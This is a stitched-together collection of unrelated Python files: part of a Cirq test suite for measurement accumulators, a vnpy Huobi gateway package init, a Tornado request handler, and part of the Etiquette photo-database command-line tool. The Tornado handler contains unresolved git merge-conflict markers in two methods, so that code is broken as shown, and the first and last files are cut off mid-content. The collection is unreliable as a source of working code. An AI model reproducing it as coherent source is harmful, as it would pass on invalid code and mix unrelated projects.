# The mean is zero since our bitstrings have balanced even- and odd-
# parity cases.
assert mean == 0
# Since we multiplied our observable by 10, the standard deviation is
# 10 [each obs val deviates by 10]. The variance is 10**2 and the
# squared-standard-error-of-the-mean can be found by dividing by the
# number of samples minus 1.
assert err == 10**2 / (4 - 1)
def test_observable_measured_result():
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
omr = cw.ObservableMeasuredResult(
setting=cw.InitObsSetting(
init_state=cirq.Z(a) * cirq.Z(b), observable=cirq.Y(a) * cirq.Y(b)
),
mean=0,
variance=5**2,
repetitions=4,
circuit_params={'phi': 52},
)
assert omr.stddev == 5
assert omr.observable == cirq.Y(a) * cirq.Y(b)
assert omr.init_state == cirq.Z(a) * cirq.Z(b)
cirq.testing.assert_equivalent_repr(omr)
assert omr.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
}
omr2 = dataclasses.replace(
omr,
circuit_params={
'phi': 52,
'observable': 3.14, # this would be a bad but legal parameter name
'param.phi': -1,
},
)
assert omr2.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
'param.observable': 3.14,
'param.param.phi': -1,
}
@pytest.fixture()
def example_bsa() -> 'cw.BitstringAccumulator':
"""Test fixture to create an (empty) example BitstringAccumulator"""
q0, q1 = cirq.LineQubit.range(2)
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = _MeasurementSpec(
max_setting=setting, circuit_params={'beta': 0.123, 'gamma': 0.456}
)
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[
setting,
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.X(q0)),
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.Y(q1)),
],
qubit_to_index={q0: 0, q1: 1},
)
return bsa
def test_bitstring_accumulator(example_bsa):
# test initialization
assert example_bsa.bitstrings.shape == (0, 2)
assert example_bsa.chunksizes.shape == (0,)
assert example_bsa.timestamps.shape == (0,)
# test consume_results
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
assert example_bsa.bitstrings.shape == (4, 2)
assert example_bsa.chunksizes.shape == (1,)
assert example_bsa.timestamps.shape == (1,)
assert example_bsa.n_repetitions == 4
with pytest.raises(ValueError):
example_bsa.consume_results(bitstrings.astype(int))
# test results
results = list(example_bsa.results)
assert len(results) == 3
for r in results:
assert r.repetitions == 4
# test records
for r in example_bsa.records:
assert isinstance(r, dict)
assert 'repetitions' in r
assert r['repetitions'] == 4
def test_bitstring_accumulator_strings(example_bsa):
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q1), cirq.X(q0) * cirq.Y(q1)], qubits=[q0, q1]
)
strings_should_be = [
'+Z(q(0)) * +Z(q(1)) β X(q(0)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) β Y(q(1)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) β X(q(0))*Y(q(1)): 0.000 +- 0.577',
]
for setting, ssb in zip(settings, strings_should_be):
assert example_bsa.summary_string(setting) == ssb, ssb
assert (
str(example_bsa)
== """Accumulator +Z(q(0)) * +Z(q(1)) β X(q(0))*Y(q(1)); 4 repetitions
+Z(q(0)) * +Z(q(1)) β X(q(0))*Y(q(1)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) β X(q(0)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) β Y(q(1)): 0.000 +- 0.577"""
)
def test_bitstring_accumulator_equality():
et = cirq.testing.EqualsTester()
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
setting = cw.InitObsSetting(init_state=cirq.Z(a) * cirq.Z(b), observable=obs)
meas_spec = _MeasurementSpec(setting, {})
cirq.testing.assert_equivalent_repr(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
)
time.sleep(1)
timestamps = np.asarray([datetime.datetime.now()])
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(setting, {'a': 2}),
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
bitstrings = bitstrings.copy()
bitstrings[0] = [1, 1]
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
chunksizes = np.asarray([2, 2])
timestamps = np.asarray(list(timestamps) * 2)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
def _get_ZZ_Z_Z_bsa_constructor_args():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(
cw.observables_to_settings(
[cirq.Z(a) * cirq.Z(b) * 7, cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]
)
)
meas_spec = _MeasurementSpec(settings[0], {})
return {
'meas_spec': meas_spec,
'simul_settings': settings,
'qubit_to_index': qubit_to_index,
'bitstrings': bitstrings,
'chunksizes': chunksizes,
'timestamps': timestamps,
}
def test_bitstring_accumulator_stats():
kwargs = _get_ZZ_Z_Z_bsa_constructor_args()
settings = kwargs['simul_settings']
a, b = kwargs['qubit_to_index']
bsa = cw.BitstringAccumulator(**kwargs)
# There are three observables, each with mean 0 because
# the four 2-bit strings have even numbers of a) ones in the
# first position b) ones in the second position c) even parity
# pairs.
np.testing.assert_allclose([0, 0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N-1)
# where xbar and ybar are 0, per above. Each individual observed
# value is +-1, so (x-xbar)(y-bar) is +-1 (neglecting observable coefficients)
# For off-diagonal elements, there are two +1 and two -1 terms for each entry
# so the total contribution is zero, and the matrix is diagonal
should_be = np.array([[4 * 7**2, 0, 0], [0, 4 * 5**2, 0], [0, 0, 4 * 3**2]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
for setting, var in zip(settings, [4 * 7**2, 4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
bad_obs = [cirq.X(a) * cirq.X(b)]
bad_setting = list(cw.observables_to_settings(bad_obs, qubits=[a, b]))[0]
with pytest.raises(ValueError):
bsa.mean(bad_setting)
def test_bitstring_accumulator_stats_2():
bitstrings = np.array([[0, 0], [0, 0], [1, 1], [1, 1]], np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(cw.observables_to_settings([cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]))
meas_spec = _MeasurementSpec(settings[0], {})
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
# There are three observables, each with mean 0 because
# the four 2-bit strings have even numbers of a) ones in the
# first position b) ones in the second position.
np.testing.assert_allclose([0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N-1)
# where xbar and ybar are 0, per above. Each individual observed
# value is +-1, so (x-xbar)(y-bar) is +-1 (neglecting observable coefficients)
# In this case, the measurements are perfectly correlated.
should_be = 4 * np.array([[5 * 5, 5 * 3], [3 * 5, 3 * 3]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
for setting, var in zip(settings, [4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
def test_bitstring_accumulator_errors():
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q0), cirq.Z(q0), cirq.Z(q0) * cirq.Z(q1)], qubits=[q0, q1]
)
grouped_settings = cw.group_settings_greedy(settings)
max_setting = list(grouped_settings.keys())[0]
simul_settings = grouped_settings[max_setting]
with pytest.raises(ValueError):
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
bitstrings=np.array([[0, 1], [0, 1]]),
chunksizes=np.array([2]),
)
with pytest.raises(ValueError):
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
bitstrings=np.array([[0, 1], [0, 1]]),
chunksizes=np.array([3]),
timestamps=[datetime.datetime.now()],
)
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings[:1],
qubit_to_index={q0: 0, q1: 1},
)
with pytest.raises(ValueError):
bsa.covariance()
with pytest.raises(ValueError):
bsa.variance(simul_settings[0])
with pytest.raises(ValueError):
bsa.mean(simul_settings[0])
bsa.consume_results(np.array([[0, 0]], dtype=np.uint8))
assert bsa.covariance().shape == (1, 1)
def test_flatten_grouped_results():
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q0), cirq.Z(q0), cirq.Z(q0) * cirq.Z(q1)], qubits=[q0, q1]
)
grouped_settings = cw.group_settings_greedy(settings)
bsas = []
for max_setting, simul_settings in grouped_settings.items():
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
)
bsa.consume_results(np.array([[0, 0], [0, 0], [0, 0]], dtype=np.uint8))
bsas.append(bsa)
results = cw.flatten_grouped_results(bsas)
assert len(results) == 4
for res in results:
# We pass all 0's to each consume_results, so everything is 1 +- 0
assert res.mean == 1
assert res.variance == 0
assert res.repetitions == 3
def _get_mock_readout_calibration(qa_0=90, qa_1=10, qb_0=91, qb_1=9):
# Mock readout correction results by constructing a BitstringAccumulator
# with two <Z> measurements
q1_ro = np.array([0] * qa_0 + [1] * qa_1)
q2_ro = np.array([0] * qb_0 + [1] * qb_1)
rs = np.random.RandomState(52)
rs.shuffle(q1_ro)
rs.shuffle(q2_ro)
ro_bitstrings = np.vstack((q1_ro, q2_ro)).T
assert ro_bitstrings.shape == (100, 2)
chunksizes = np.asarray([100])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
ro_settings = list(cw.observables_to_settings([cirq.Z(a), cirq.Z(b)], qubits=[a, b]))
(ro_meas_spec_setting,) = list(
cw.observables_to_settings([cirq.Z(a) * cirq.Z(b)], qubits=[a, b])
)
ro_meas_spec = _MeasurementSpec(ro_meas_spec_setting, {})
ro_bsa = cw.BitstringAccumulator(
meas_spec=ro_meas_spec,
simul_settings=ro_settings,
qubit_to_index=qubit_to_index,
bitstrings=ro_bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
return ro_bsa, ro_settings, ro_meas_spec_setting
def test_readout_correction():
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
ro_bsa, ro_settings, ro_meas_spec_setting = _get_mock_readout_calibration()
# observables range from 1 to -1 while bitstrings range from 0 to 1
assert ro_bsa.mean(ro_settings[0]) == 0.8
assert ro_bsa.mean(ro_settings[1]) == 0.82
assert np.isclose(ro_bsa.mean(ro_meas_spec_setting), 0.8 * 0.82, atol=0.05)
bitstrings = np.array(
[[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 1], [1, 1]], dtype=np.uint8
)
chunksizes = np.asarray([len(bitstrings)])
timestamps = np.asarray([datetime.datetime.now()])
qubit_to_index = {a: 0, b: 1}
settings = list(
cw.observables_to_settings([cirq.X(a) * cirq.Y(b), cirq.X(a), cirq.Y(b)], qubits=[a, b])
)
meas_spec = _MeasurementSpec(settings[0], {})
# First, make one with no readout correction
bsa1 = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
# [XY: one excitation, X: one excitation, Y: two excitations]
np.testing.assert_allclose([1 - 1 / 4, 1 - 1 / 4, 1 - 2 / 4], bsa1.means())
np.testing.assert_allclose([0.75, 0.75, 0.5], bsa1.means())
# Turn on readout correction
bsa2 = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
readout_calibration=ro_bsa,
)
# Readout correction increases variance
for setting in settings:
assert bsa2.variance(setting) > bsa1.variance(setting)
np.testing.assert_allclose(
[0.75 / (0.8 * 0.82), 0.75 / 0.8, 0.5 / 0.82], bsa2.means(), atol=0.01
)
# Variance becomes singular when readout error is 50/50
ro_bsa_50_50, _, _ = _get_mock_readout_calibration(qa_0=50, qa_1=50)
bsa3 = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
readout_calibration=ro_bsa_50_50,
)
with pytest.raises(ZeroDivisionError):
bsa3.means()
assert bsa3.variance(settings[1]) == np.inf
def test_readout_correction_errors():
kwargs = _get_ZZ_Z_Z_bsa_constructor_args()
settings = kwargs['simul_settings']
ro_bsa, _, _ = _get_mock_readout_calibration()
kwargs['readout_calibration'] = ro_bsa
bsa = cw.BitstringAccumulator(**kwargs)
# Variance becomes singular as the estimated value approaches zero
np.testing.assert_allclose(bsa.means(), [0, 0, 0])
assert bsa.variance(settings[0]) == np.inf
|
# The MIT License (MIT)
#
# Copyright (c) 2015-present, Xiaoyou Chen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import importlib_metadata
from .huobi_spot_gateway import HuobiSpotGateway
from .huobi_futures_gateway import HuobiFuturesGateway
from .huobi_usdt_gateway import HuobiUsdtGateway
from .huobi_inverse_gateway import HuobiInverseGateway
try:
__version__ = importlib_metadata.version("vnpy_huobi")
except importlib_metadata.PackageNotFoundError:
__version__ = "dev"
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Ivar Vargas Belizario
# Copyright (c) 2020
# E-mail: ivar@usp.br
import tornado.ioloop
import tornado.web
import tornado.httpserver
import uuid
from vx.pgff.Settings import *
class BaseHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')
def get_current_user(self):
if Settings.MULIUSER == 0:
return "localuser"
elif Settings.MULIUSER == 1:
return self.get_secure_cookie("user")
def get_current_email(self):
if Settings.MULIUSER == 0:
return "localuser"
elif Settings.MULIUSER == 1:
<<<<<<< HEAD
return self.get_secure_cookie("user")
=======
return self.get_secure_cookie("email")
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
def get_current_adminid(self):
if Settings.MULIUSER == 0:
return "localuser"
elif Settings.MULIUSER == 1:
<<<<<<< HEAD
return self.get_secure_cookie("user")
=======
return self.get_secure_cookie("adminid")
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# return self.get_secure_cookie("adminid")
|
import argparse
import os
import re
import sys
from voussoirkit import betterhelp
from voussoirkit import interactive
from voussoirkit import pathclass
from voussoirkit import pipeable
from voussoirkit import spinal
from voussoirkit import stringtools
from voussoirkit import vlogging
import etiquette
# HELPERS ##########################################################################################
def export_symlinks_albums(albums, destination, dry_run):
album_directory_names = etiquette.helpers.decollide_names(albums, lambda a: a.display_name)
for (album, directory_name) in album_directory_names.items():
associated_directories = album.get_associated_directories()
if len(associated_directories) == 1:
album_dir = associated_directories.pop()
directory_name = etiquette.helpers.remove_path_badchars(directory_name)
symlink_dir = destination.with_child(directory_name)
if dry_run:
yield symlink_dir
continue
if not album_dir.exists:
continue
if symlink_dir.exists:
yield symlink_dir
continue
print(album, symlink_dir)
os.symlink(src=album_dir, dst=symlink_dir)
yield symlink_dir
def export_symlinks_photos(photos, destination, dry_run):
photo_filenames = etiquette.helpers.decollide_names(photos, lambda p: p.basename)
for (photo, filename) in photo_filenames.items():
symlink_path = destination.with_child(filename)
if dry_run:
yield symlink_path
continue
if not photo.real_path.exists:
continue
if symlink_path.exists:
yield symlink_path
continue
print(symlink_path.absolute_path)
os.symlink(src=photo.real_path, dst=symlink_path)
yield symlink_path
def get_photos_by_glob(pattern):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
pattern = pathclass.normalize_sep(pattern)
if pattern == '**':
return search_in_cwd(yield_photos=True, yield_albums=False)
cwd = pathclass.cwd()
(folder, pattern) = os.path.split(pattern)
if folder:
folder = cwd.join(folder)
else:
folder = cwd
files = [f for f in folder.glob(pattern) if f.is_file]
for file in files:
try:
photo = photodb.get_photo_by_path(file)
yield photo
except etiquette.exceptions.NoSuchPhoto:
pass
def get_photos_by_globs(patterns):
for pattern in patterns:
yield from get_photos_by_glob(pattern)
def get_photos_from_args(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
photos = []
if args.photo_id_args:
photos.extend(photodb.get_photos_by_id(args.photo_id_args))
if args.photo_search_args:
photos.extend(search_by_argparse(args.photo_search_args, yield_photos=True))
return photos
def get_albums_from_args(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
albums = []
if args.album_id_args:
albums.extend(photodb.get_albums_by_id(args.album_id_args))
if args.album_search_args:
albums.extend(search_by_argparse(args.album_search_args, yield_albums=True))
return albums
def search_in_cwd(**kwargs):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
cwd = pathclass.cwd()
return photodb.search(
within_directory=cwd,
**kwargs,
)
def search_by_argparse(args, yield_albums=False, yield_photos=False):
return search_in_cwd(
area=args.area,
width=args.width,
height=args.height,
ratio=args.ratio,
bytes=args.bytes,
duration=args.duration,
author=args.author,
created=args.created,
extension=args.extension,
extension_not=args.extension_not,
filename=args.filename,
has_tags=args.has_tags,
has_thumbnail=args.has_thumbnail,
is_searchhidden=args.is_searchhidden,
sha256=args.sha256,
mimetype=args.mimetype,
tag_musts=args.tag_musts,
tag_mays=args.tag_mays,
tag_forbids=args.tag_forbids,
tag_expression=args.tag_expression,
limit=args.limit,
offset=args.offset,
orderby=args.orderby,
yield_albums=yield_albums,
yield_photos=yield_photos,
)
# ARGPARSE #########################################################################################
def add_remove_tag_argparse(args, action):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
tag = photodb.get_tag(name=args.tag_name)
if args.any_id_args:
photos = get_photos_from_args(args)
elif args.globs:
photos = get_photos_by_globs(args.globs)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
for photo in photos:
if action == 'add':
photo.add_tag(tag)
elif action == 'remove':
photo.remove_tag(tag)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def delete_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
need_commit = False
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
for photo in photos:
photo.delete(delete_file=args.delete_file)
need_commit = True
if args.album_id_args or args.album_search_args:
albums = get_albums_from_args(args)
for album in albums:
album.delete()
need_commit = True
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def digest_directory_argparse(args):
directories = pipeable.input(args.directory, strip=True, skip_blank=True)
directories = [pathclass.Path(d) for d in directories]
for directory in directories:
directory.assert_is_directory()
photodb = etiquette.photodb.PhotoDB.closest_photodb()
need_commit = False
for directory in directories:
digest = photodb.digest_directory(
directory,
exclude_directories=args.exclude_directories,
exclude_filenames=args.exclude_filenames,
glob_directories=args.glob_directories,
glob_filenames=args.glob_filenames,
hash_kwargs={'bytes_per_second': args.hash_bytes_per_second},
make_albums=args.make_albums,
new_photo_ratelimit=args.ratelimit,
recurse=args.recurse,
yield_albums=True,
yield_photos=True,
)
for result in digest:
# print(result)
need_commit = True
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def easybake_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
for eb_string in args.eb_strings:
notes = photodb.easybake(eb_string)
for (action, tagname) in notes:
print(action, tagname)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def export_symlinks_argparse(args):
destination = pathclass.Path(args.destination)
destination.makedirs(exist_ok=True)
total_paths = set()
if args.album_id_args or args.album_search_args:
albums = get_albums_from_args(args)
export = export_symlinks_albums(
albums,
destination,
dry_run=args.dry_run,
)
total_paths.update(export)
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
export = export_symlinks_photos(
photos,
destination,
dry_run=args.dry_run,
)
total_paths.update(export)
if not args.prune or args.dry_run:
return 0
symlinks = spinal.walk(destination, yield_directories=True, yield_files=True)
symlinks = set(path for path in symlinks if path.is_link)
symlinks = symlinks.difference(total_paths)
for old_symlink in symlinks:
print(f'Pruning {old_symlink}.')
os.remove(old_symlink)
if not old_symlink.parent.listdir():
os.rmdir(old_symlink.parent)
checkdirs = set(spinal.walk(destination, yield_directories=True, yield_files=False))
while checkdirs:
check = checkdirs.pop()
if check not in destination:
continue
if len(check.listdir()) == 0:
os.rmdir(check)
checkdirs.add(check.parent)
return 0
def generate_thumbnail_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
need_commit = False
try:
for photo in photos:
photo.generate_thumbnail()
need_commit = True
except KeyboardInterrupt:
pass
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def init_argparse(args):
photodb = etiquette.photodb.PhotoDB(create=True)
photodb.commit()
return 0
def purge_deleted_files_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
need_commit = False
for deleted in photodb.purge_deleted_files(photos):
need_commit = True
print(deleted)
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def purge_empty_albums_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
# We do not check args.album_search_args because currently it is not
# possible for search results to find empty albums on account of the fact
# that albums are only yielded when they contain some result photo.
if args.album_id_args:
albums = get_albums_from_args(args)
else:
albums = photodb.get_albums_within_directory(pathclass.cwd())
need_commit = False
for deleted in photodb.purge_empty_albums(albums):
need_commit = True
print(deleted)
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def reload_metadata_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
hash_kwargs = {
'bytes_per_second': args.hash_bytes_per_second,
'callback_progress': spinal.callback_progress_v1,
}
need_commit = False
try:
for photo in photos:
if not photo.real_path.is_file:
continue
need_reload = (
args.force or
photo.mtime != photo.real_path.stat.st_mtime or
photo.bytes != photo.real_path.stat.st_size
)
if not need_reload:
continue
photo.reload_metadata(hash_kwargs=hash_kwargs)
need_commit = True
except KeyboardInterrupt:
pass
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def relocate_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
photo = photodb.get_photo(args.photo_id)
photo.relocate(args.filepath)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def search_argparse(args):
photos = search_by_argparse(args, yield_photos=True)
for photo in photos:
print(photo.real_path.absolute_path)
return 0
def show_associated_directories_argparse(args):
if args.album_id_args or args.album_search_args:
albums = get_albums_from_args(args)
else:
albums = search_in_cwd(yield_photos=False, yield_albums=True)
for album in albums:
directories = album.get_associated_directories()
if not directories:
continue
directories = [f'"{d.absolute_path}"' for d in directories]
directories = ' '.join(directories)
print(f'{album} | {directories}')
return 0
def set_unset_searchhidden_argparse(args, searchhidden):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_search_args:
args.photo_search_args.is_searchhidden = not searchhidden
if args.album_search_args:
args.album_search_args.is_searchhidden = not searchhidden
if args.any_id_args:
photos = get_photos_from_args(args)
albums = get_albums_from_args(args)
photos.extend(photo for album in albums for photo in album.walk_photos())
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
for photo in photos:
print(photo)
photo.set_searchhidden(searchhidden)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def tag_breplace_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
renames = []
tag_names = photodb.get_all_tag_names()
all_names = tag_names.union(photodb.get_all_synonyms())
for tag_name in tag_names:
if args.regex:
new_name = re.sub(args.replace_from, args.replace_to, tag_name)
else:
new_name = tag_name.replace(args.replace_from, args.replace_to)
new_name = photodb.normalize_tagname(new_name)
if new_name == tag_name:
continue
if new_name in all_names:
raise etiquette.exceptions.TagExists(new_name)
if args.set_synonym:
printline = f'{tag_name} -> {new_name}+{tag_name}'
else:
printline = f'{tag_name} -> {new_name}'
renames.append((tag_name, new_name, printline))
if not args.autoyes:
for (tag_name, new_name, printline) in renames:
print(printline)
if not interactive.getpermission('Ok?', must_pick=True):
return 0
for (tag_name, new_name, printline) in renames:
print(printline)
tag = photodb.get_tag(tag_name)
tag.rename(new_name)
if args.set_synonym:
tag.add_synonym(tag_name)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def tag_list_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
tags = photodb.get_all_tag_names()
synonyms = photodb.get_all_synonyms()
keys = sorted(tags.union(synonyms.keys()))
for key in keys:
if key in synonyms:
print(f'{key}={synonyms[key]}')
else:
print(key)
return 0
DOCSTRING = '''
Etiquette CLI
=============
This is the command-line interface for Etiquette, so that you can automate your
database and integrate it into other scripts.
The following commands are available:
{add_tag}
{remove_tag}
{delete}
{digest}
{easybake}
{export_symlinks}
{generate_thumbnail}
{init}
{purge_deleted_files}
{purge_empty_albums}
{reload_metadata}
{relocate}
{search}
{show_associated_directories}
{set_searchhidden}
{unset_searchhidden}
{tag_breplace}
{tag_list}
You can add --yes to avoid the "Commit?" prompt on commands that modify the db.
TO SEE DETAILS ON EACH COMMAND, RUN
> etiquette_cli.py <command> --help
'''
SUB_DOCSTRINGS = dict(
add_tag='''
add_tag:
